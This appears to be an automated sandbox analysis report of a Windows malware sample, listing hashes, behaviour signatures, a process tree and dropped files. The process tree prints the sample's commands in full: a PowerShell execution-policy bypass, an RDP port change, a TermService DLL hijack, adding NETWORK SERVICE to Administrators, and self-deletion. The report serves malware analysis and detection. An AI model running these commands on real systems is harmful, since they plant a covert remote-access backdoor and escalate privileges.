Analysis
-
max time kernel
34s -
max time network
111s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 21:08
General
-
Target
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
-
Size
3.8MB
-
MD5
00ae90dd7e86dc9f42dd6df84652122d
-
SHA1
ce09069c7a20d4ac0ce4169a27eab84d3d0e5fdf
-
SHA256
7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860
-
SHA512
835808a455f963ffb37bb7d3fabdf7f52f0435b1a4f2e4600148024c25657f4ab579f44c444239d118183365eb8e73820c52fabbf8cb4f49b9372f62633fdee5
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6373.tmp" "c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RES6373.tmpMD5
076ad6691cad9f3604f3d2a6f8e27ffb
SHA19ef67ab5ef369eeaec08d07df5adfa4ac07f10cc
SHA256762563c4c9146da8884e6606fa04f96f0143e93fd28bb1655a91788b7034ffa2
SHA51296f35cfe8a7b09480928a0b498414d7de9066997e0a578af901bbddb4bd6ba49b9e1d9142a48ca77707c627d08f36ee7ea5493e9a32f6f828f80e176b11ec216
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
851bf8df96899b2cc50af8047e9fbe5c
SHA1e259d3ea9eabae926f74358b6e8f583cfcb4106b
SHA256b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6
SHA512648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792
-
C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.dllMD5
837e1973b2d449b32e0f579780d2c5c6
SHA168723961c820a3ba0eb42bf47131472d5d7c97f4
SHA256d9ad449541e07a9fb278111823c4ccff34a3b50a0ebe34f124936e9fc9a77d3e
SHA51293a47aa54685d9fd2887c743135f768e5d424841c67cd84e2660f4f33f722816791554aef6ecb623cbb41035abbc46a78aeb8b41905065a90729857543cac746
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMPMD5
055814cf745cd28e1dd40ba350a337e4
SHA1961e9bfe0077c70c327571900e3f8089fdb20995
SHA256b0a95bd5edb39f87b5e1c711b10c00dd23f1a50534a9b4e795c3355e4b90dd9c
SHA5120e413449ea5cd15f71944b156696b285a83d3c0ab2c18b868409394730e64daed217d1fcf38a06a4214ad62afe0134b57d17fe16d93cb46a4ea68995c00666b9
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdlineMD5
51928b31ec8ce992b8ae3aadcf861a6a
SHA18cb8df09edfcb73ca6384662598b14abfd16b090
SHA25691fb461e29cb50a66727902c8422d77db8ef3127558ec7796ce3021006b1eb0b
SHA5128db1e6cb97b5fbbe9b530339f56cfaa1ba3ebeebc3a19bc07c3d769154bd9a3238137d9803afedd2a3a705606b35cee4215f5351081dc84aa06fcb2b3017b732
-
memory/860-44-0x00000000091B0000-0x00000000091B1000-memory.dmpFilesize
4KB
-
memory/860-46-0x0000000009300000-0x0000000009301000-memory.dmpFilesize
4KB
-
memory/860-45-0x0000000009360000-0x0000000009361000-memory.dmpFilesize
4KB
-
memory/860-48-0x00000000092F0000-0x00000000092F1000-memory.dmpFilesize
4KB
-
memory/860-23-0x0000000000000000-mapping.dmp
-
memory/860-43-0x0000000009050000-0x0000000009051000-memory.dmpFilesize
4KB
-
memory/860-35-0x0000000009070000-0x00000000090A3000-memory.dmpFilesize
204KB
-
memory/860-24-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/1476-111-0x0000000000000000-mapping.dmp
-
memory/1864-17-0x0000000000000000-mapping.dmp
-
memory/2100-115-0x0000000000000000-mapping.dmp
-
memory/2252-78-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/2252-77-0x0000000000000000-mapping.dmp
-
memory/2500-110-0x0000000000000000-mapping.dmp
-
memory/2884-108-0x0000000000000000-mapping.dmp
-
memory/3080-0-0x0000000000000000-mapping.dmp
-
memory/3080-6-0x0000000007EF0000-0x0000000007EF1000-memory.dmpFilesize
4KB
-
memory/3080-1-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/3080-13-0x000000000A500000-0x000000000A501000-memory.dmpFilesize
4KB
-
memory/3080-12-0x000000000BF60000-0x000000000BF61000-memory.dmpFilesize
4KB
-
memory/3080-10-0x0000000008750000-0x0000000008751000-memory.dmpFilesize
4KB
-
memory/3080-22-0x00000000093F0000-0x00000000093F1000-memory.dmpFilesize
4KB
-
memory/3080-8-0x0000000008450000-0x0000000008451000-memory.dmpFilesize
4KB
-
memory/3080-7-0x00000000080C0000-0x00000000080C1000-memory.dmpFilesize
4KB
-
memory/3080-21-0x000000000A550000-0x000000000A551000-memory.dmpFilesize
4KB
-
memory/3080-2-0x0000000004F70000-0x0000000004F71000-memory.dmpFilesize
4KB
-
memory/3080-107-0x0000000009B20000-0x0000000009B21000-memory.dmpFilesize
4KB
-
memory/3080-5-0x0000000007F60000-0x0000000007F61000-memory.dmpFilesize
4KB
-
memory/3080-4-0x0000000007CE0000-0x0000000007CE1000-memory.dmpFilesize
4KB
-
memory/3080-133-0x0000000009840000-0x0000000009841000-memory.dmpFilesize
4KB
-
memory/3080-106-0x0000000009510000-0x0000000009511000-memory.dmpFilesize
4KB
-
memory/3080-9-0x00000000088A0000-0x00000000088A1000-memory.dmpFilesize
4KB
-
memory/3080-3-0x0000000007680000-0x0000000007681000-memory.dmpFilesize
4KB
-
memory/3128-112-0x0000000000000000-mapping.dmp
-
memory/3760-109-0x0000000000000000-mapping.dmp
-
memory/4256-14-0x0000000000000000-mapping.dmp
-
memory/4316-51-0x0000000074020000-0x000000007470E000-memory.dmpFilesize
6.9MB
-
memory/4316-50-0x0000000000000000-mapping.dmp
-
memory/4356-113-0x0000000000000000-mapping.dmp
-
memory/4540-114-0x0000000000000000-mapping.dmp
-
memory/4556-116-0x0000000000000000-mapping.dmp
-
memory/4616-118-0x0000000000000000-mapping.dmp
-
memory/4640-117-0x0000000000000000-mapping.dmp
-
memory/4740-121-0x0000000000000000-mapping.dmp
-
memory/4872-119-0x0000000000000000-mapping.dmp
-
memory/5064-122-0x0000000000000000-mapping.dmp
-
memory/5080-120-0x0000000000000000-mapping.dmp